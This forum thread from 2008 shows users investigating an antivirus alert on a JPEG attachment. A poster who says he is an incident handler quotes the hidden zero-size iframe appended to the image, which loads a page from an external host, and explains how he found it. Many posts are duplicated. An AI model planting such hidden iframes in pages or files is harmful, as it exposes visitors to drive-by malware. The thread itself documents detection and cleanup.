Trojan.Clicker Whilst browsing the Systems 2008
Posted by: Blueknowz on 20 February 2008
Whilst browsing the Systems 2008 on page 12 my Anti Virus Checker Steganos through up a Trojan thought you would like to know!!
Posted on: 20 February 2008 by dave simpson
Most likely a false positive. Nothing to report here with NOD32.
Posted on: 20 February 2008 by {OdS}
Nothing to report with Sophos either... Still, it might be config related.
Posted on: 20 February 2008 by 555
No problems detected with V-com either.
Maybe a coincidence that you were looking at P12 when you were attacked Blueknowz?
Have you run a system virus (etc) check/sweep on your 'puter?
Maybe a coincidence that you were looking at P12 when you were attacked Blueknowz?
Have you run a system virus (etc) check/sweep on your 'puter?
Posted on: 20 February 2008 by Blueknowz
Check running now ,thanks guys
Posted on: 20 February 2008 by dave simpson
Cool..let us know if you cannot remove it and we'll assist. Do post the exact name of the infection.
Posted on: 20 February 2008 by Blueknowz
detected: Trojan program Trojan-Clicker.HTML.IFrame.js URL: http://forums.naim-audio.com/groupee_files/attachments/...ControlArm_54110.jpg
I get this every time I access page 12 any ideas ..Jim
I get this every time I access page 12 any ideas ..Jim
Posted on: 20 February 2008 by dave simpson
It appears to be a false positive. I'm not familiar with your A-V vendor. If they offer support for this situation, I'd email them the link so they can investigate and send a correction out with their next push to exclude the code.
I'm running scans here but it's highly unlikely anything malicious will turn up considering the variety of scans thread posters have initialized already. As well, rest assured, Naim will have already been on the case;-)
Keep us posted...
I'm running scans here but it's highly unlikely anything malicious will turn up considering the variety of scans thread posters have initialized already. As well, rest assured, Naim will have already been on the case;-)
Keep us posted...
Posted on: 20 February 2008 by Blueknowz
Thanks Dave, Steganos is part of the Karpensky Labs Group will contact them after the full system scan is complete ,....Jim
Posted on: 20 February 2008 by dave simpson
If you meant "Kaspersky"--no worries. One of the finest scan engines available. They will sort the problem. Do let us know the final results. expect Adam to move this thread to the padded cell though.
best,
dave
best,
dave
Posted on: 20 February 2008 by Steve Hall
Blueknowz,
Your antivirus is alerting on the file you suggest.
Although the file is a JPEG, it has the following string embedded in it:
<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>
This is what is triggering your Antivirus as the IFRAME is detected as malicious due to the zero height and width parameters.
The host un.uiiiu.com is not resolving, but the domain uiiiu.com does exist, and is located in China.
I would suggest that this graphic is removed from the site, as should that host be reactivated, and its common for the these things to lay dormant and be turned on at a later date, then it could impact some Naim customers.
Steve (Incident Handler for the SANS Internet Storm Centre)
Your antivirus is alerting on the file you suggest.
Although the file is a JPEG, it has the following string embedded in it:
<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>
This is what is triggering your Antivirus as the IFRAME is detected as malicious due to the zero height and width parameters.
The host un.uiiiu.com is not resolving, but the domain uiiiu.com does exist, and is located in China.
I would suggest that this graphic is removed from the site, as should that host be reactivated, and its common for the these things to lay dormant and be turned on at a later date, then it could impact some Naim customers.
Steve (Incident Handler for the SANS Internet Storm Centre)
Posted on: 20 February 2008 by BigH47
Is there a potential problem for the rest of us?
What should we do if yes?
What should we do if yes?
Posted on: 20 February 2008 by Steve Hall
It shouldn't has the URL it is trying to trick the browser into downloading is failing.
Although, I've no way of knowing if its was successful at a point in the past, or if it will become so.
The real exploit which would do damage would be downloaded from the baidu.html file, so as that fails, I cant look any further.
Although, I've no way of knowing if its was successful at a point in the past, or if it will become so.
The real exploit which would do damage would be downloaded from the baidu.html file, so as that fails, I cant look any further.
Posted on: 20 February 2008 by Blueknowz
quote:<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>
Steve how did you find this info from what I posted ,I can't see it in that string,although I have heard of virus& Trojan hidden in JPEGs ....Jim
Posted on: 20 February 2008 by Steve Hall
As your AV triggered on that one file, I download it and submitted it to VirusTotal. The results can be seen HERE
So, as some AV vendors concurred that there was a virus in there somewhere, it was worth a further look.
If you look at the VirusTotal analysis the "Packer" type is listed as append, which just indicates that the threat has been added to the end of the file.
So, lets dump the end of the file, so using my trusty Mac Pro, using the strings command, you get
<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>
at the end of the file, just as we were told it would be.
The host part of the URL is un.uiiiu.com which does not resolve if you do a DNS lookup on it.
Although doing a whois on uiiiu.com does indicate that it exists, and is registered as being in China.
Hope this helps.
So, as some AV vendors concurred that there was a virus in there somewhere, it was worth a further look.
If you look at the VirusTotal analysis the "Packer" type is listed as append, which just indicates that the threat has been added to the end of the file.
So, lets dump the end of the file, so using my trusty Mac Pro, using the strings command, you get
<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>
at the end of the file, just as we were told it would be.
The host part of the URL is un.uiiiu.com which does not resolve if you do a DNS lookup on it.
Although doing a whois on uiiiu.com does indicate that it exists, and is registered as being in China.
Hope this helps.
Posted on: 21 February 2008 by Blueknowz
Steve this is the reply I recieved from Steganos
Dear Sir or Madam,
thank you for writing to Steganos Customer Service.
It seems that this site is infected. Please contact the admin of this
board and ask for a possible infection on his side.
If you are still experiencing difficulties, please feel free to write
back.
When answering to this e-mail please leave the subject line unchanged.
This is to ensure the mail returns directly to my inbox. Thank you.
Kind regards
Stefan Butz
Steganos Customer Service
Dear Sir or Madam,
thank you for writing to Steganos Customer Service.
It seems that this site is infected. Please contact the admin of this
board and ask for a possible infection on his side.
If you are still experiencing difficulties, please feel free to write
back.
When answering to this e-mail please leave the subject line unchanged.
This is to ensure the mail returns directly to my inbox. Thank you.
Kind regards
Stefan Butz
Steganos Customer Service